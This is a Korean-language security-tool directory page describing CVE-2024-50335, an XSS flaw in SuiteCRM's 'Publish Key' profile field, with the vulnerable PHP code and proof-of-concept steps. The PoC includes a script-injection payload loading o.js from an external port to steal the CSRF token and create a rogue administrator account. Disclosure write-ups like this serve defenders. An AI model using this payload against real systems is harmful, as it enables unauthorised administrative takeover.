Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-50335 — SuiteCRM의 보안 취약점으로, CSRF 토큰을 탈취하여 적절한 인증 없이 새로운 관리자 사용자를 생성하는 등의 무단 작업을 수행할 수 있습니다. | Kitploit
도구/GitHubGitHub/shellkraft/cve-2024-50335
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

SuiteCRM의 보안 취약점으로, CSRF 토큰을 탈취하여 적절한 인증 없이 새로운 관리자 사용자를 생성하는 등의 무단 작업을 수행할 수 있습니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-50335: 인증된 XSS로 'Publish Key' 필드에서 무단 관리자 사용자 생성 허용

요약

SuiteCRM의 프로필 편집 페이지에 있는 'Publish Key' 필드는 반사형 크로스 사이트 스크립팅(Reflected XSS)에 취약하여, 공격자가 악성 JavaScript 코드를 주입할 수 있습니다. 이를 이용해 CSRF 토큰을 탈취하고 적절한 인증 없이 새로운 관리 사용자를 생성하는 등 무단 작업을 수행할 수 있습니다.


세부 정보

이 취약점은 SuiteCRM 애플리케이션 내의 Publish Key 필드에 대한 입력 검증 및 이스케이프 처리(새니타이제이션)가 불충분하여 발생합니다. 공격자가 악성 스크립트를 주입하면, 해당 스크립트는 인증된 사용자의 세션 컨텍스트 내에서 실행됩니다. 주입된 스크립트(o.js)는 탈취한 CSRF 토큰을 활용하여 새로운 관리 사용자를 생성하는 요청을 위조함으로써 CRM 인스턴스의 무결성과 보안을 효과적으로 손상시킵니다.


영향

이 취약점은 심각한 크로스 사이트 스크립팅(XSS) 문제입니다. 그 영향은 다음과 같습니다:

  1. 무단 관리자 접근: 공격자가 새로운 관리 사용자를 생성하여 CRM 인스턴스에 대한 완전한 제어권을 얻을 수 있습니다.
  2. CSRF 토큰 도용: 인증된 사용자를 대신하여 무단 작업을 수행할 수 있습니다.
  3. 데이터 무결성 손상: 사용자 계정 및 설정을 조작할 수 있어 데이터 손실, 유출 또는 무단 수정이 발생할 수 있습니다.

취약한 PHP 소스 코드

$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);

개념 증명 (PoC)

  1. 유효한 관리자(Administrator) 자격 증명을 사용하여 SuiteCRM에 로그인합니다.
  2. 프로필 편집(Edit Profile)으로 이동: 관리자 계정의 프로필 편집 페이지에 접속합니다.
  3. 고급(Advanced) 탭 아래의 "Publish Key" 필드에 다음 스크립트를 주입합니다:
<script src=//localhost:1235/o.js>
  1. o.js가 로컬호스트의 1235 포트에서 서빙되도록 하고, 제공된 JavaScript 코드 스니펫에 설명된 익스플로잇 코드를 제공하는 서버를 설정합니다.
  2. 관리자 프로필에 변경 사항을 저장합니다.
  3. SuiteCRM 페이지를 다시 로드하면 악성 o.js 스크립트가 실행되어 CSRF 토큰을 탈취하고 이를 사용하여 다음 자격 증명을 가진 새로운 관리 사용자를 생성합니다.
Username - imposter
Password - ok
  1. 새로 생성된 관리 사용자 자격 증명으로 로그인하여 성공적인 악용을 확인합니다.

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
  • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
도구 다운로드